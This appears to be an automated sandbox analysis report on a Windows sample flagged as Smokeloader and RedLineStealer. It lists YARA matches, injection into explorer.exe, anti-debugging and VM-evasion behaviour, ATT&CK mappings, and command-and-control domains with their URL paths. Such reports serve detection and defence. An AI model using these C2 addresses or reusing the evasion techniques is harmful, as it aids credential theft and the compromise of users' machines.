      Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 1HGXcC63iu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: scjabht.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/2@3/2
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_02DD03D8 CreateToolhelp32Snapshot,Module32First,0_2_02DD03D8
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\scjabhtJump to behavior
      Source: 1HGXcC63iu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 1HGXcC63iu.exeReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Users\user\Desktop\1HGXcC63iu.exe "C:\Users\user\Desktop\1HGXcC63iu.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\scjabht C:\Users\user\AppData\Roaming\scjabht
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeUnpacked PE file: 0.2.1HGXcC63iu.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.jekin:W;.zidisi:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\scjabhtUnpacked PE file: 5.2.scjabht.400000.0.unpack .text:ER;.rdata:R;.data:W;.jekin:W;.zidisi:W;.rsrc:R; vs .text:EW;
      Source: 1HGXcC63iu.exeStatic PE information: section name: .jekin
      Source: 1HGXcC63iu.exeStatic PE information: section name: .zidisi
      Source: scjabht.1.drStatic PE information: section name: .jekin
      Source: scjabht.1.drStatic PE information: section name: .zidisi
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_02D91540 pushad ; ret 0_2_02D91550
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_02DD21D4 push B63524ADh; retn 001Fh0_2_02DD220B
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_02DD2CD1 pushfd ; iretd 0_2_02DD2CD2
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_02DD3E31 push esp; ret 0_2_02DD3E33
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_004031DB push eax; ret 5_2_004032AB
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_02B71540 pushad ; ret 5_2_02B71550
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_02DA4789 push esp; ret 5_2_02DA478B
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_02DA3629 pushfd ; iretd 5_2_02DA362A
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_02DA2B2C push B63524ADh; retn 001Fh5_2_02DA2B63
      Source: 1HGXcC63iu.exeStatic PE information: section name: .text entropy: 7.517270263050042
      Source: scjabht.1.drStatic PE information: section name: .text entropy: 7.517270263050042
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\scjabhtJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\scjabhtJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\1hgxcc63iu.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\scjabht:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\scjabhtAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\scjabhtAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 436Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1107Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 832Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3837Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 878Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7356Thread sleep count: 436 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7364Thread sleep count: 1107 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7364Thread sleep time: -110700s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 7360Thread sleep count: 832 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7360Thread sleep time: -83200s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 7724Thread sleep count: 299 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7732Thread sleep count: 327 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7732Thread sleep time: -32700s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 7728Thread sleep count: 287 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7364Thread sleep count: 3837 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7364Thread sleep time: -383700s >= -30000sJump to behavior
      Source: explorer.exe, 00000001.00000000.1763888567.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1763031463.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1763031463.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1763888567.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1763888567.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1763031463.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1763888567.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1763031463.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_02D90D90 mov eax, dword ptr fs:[00000030h]0_2_02D90D90
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_02D9092B mov eax, dword ptr fs:[00000030h]0_2_02D9092B
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_02DCFCB5 push dword ptr fs:[00000030h]0_2_02DCFCB5
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_02B70D90 mov eax, dword ptr fs:[00000030h]5_2_02B70D90
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_02B7092B mov eax, dword ptr fs:[00000030h]5_2_02B7092B
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_02DA060D push dword ptr fs:[00000030h]5_2_02DA060D

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: scjabht.1.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 189.161.95.103 80Jump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeThread created: C:\Windows\explorer.exe EIP: 13419A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtThread created: unknown EIP: 33E19A8Jump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\scjabhtSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1760721422.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1759570525.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1763031463.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1759570525.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1759570525.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1759570525.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00417620 InterlockedExchangeAdd,ReadConsoleA,FindAtomW,GetConsoleFontSize,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,GetBoundsRect,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,LoadLibraryA,InterlockedDecrement,0_2_00417620

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping411
      Security Software Discovery
      Remote ServicesData from Local System2
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Virtualization/Sandbox Evasion
      LSASS Memory12
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager3
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive113
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing
      Cached Domain Credentials13
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532852 Sample: 1HGXcC63iu.exe Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 21 nwgrus.ru 2->21 27 Suricata IDS alerts for network traffic 2->27 29 Found malware configuration 2->29 31 Malicious sample detected (through community Yara rule) 2->31 33 5 other signatures 2->33 7 1HGXcC63iu.exe 2->7         started        10 scjabht 2->10         started        signatures3 process4 signatures5 35 Detected unpacking (changes PE section rights) 7->35 37 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->37 39 Maps a DLL or memory area into another process 7->39 47 2 other signatures 7->47 12 explorer.exe 70 3 7->12 injected 41 Multi AV Scanner detection for dropped file 10->41 43 Machine Learning detection for dropped file 10->43 45 Checks if the current machine is a virtual machine (disk enumeration) 10->45 process6 dnsIp7 23 nwgrus.ru 189.161.95.103, 49736, 49737, 49738 UninetSAdeCVMX Mexico 12->23 25 58.151.148.90, 50037, 50038, 50039 POWERVIS-AS-KRLGPOWERCOMMKR Korea Republic of 12->25 17 C:\Users\user\AppData\Roaming\scjabht, PE32 12->17 dropped 19 C:\Users\user\...\scjabht:Zone.Identifier, ASCII 12->19 dropped 49 System process connects to network (likely due to code injection or exploit) 12->49 51 Benign windows process drops PE files 12->51 53 Deletes itself after installation 12->53 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->55 file8 signatures9

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      1HGXcC63iu.exe34%ReversingLabs
      1HGXcC63iu.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\scjabht100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\scjabht34%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://aka.ms/Vh5j3k0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      nwgrus.ru
      189.161.95.103
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://unicea.ws/tmp/index.phptrue
          unknown
          http://nwgrus.ru/tmp/index.phptrue
            unknown
            http://tech-servers.in.net/tmp/index.phptrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                http://schemas.miexplorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
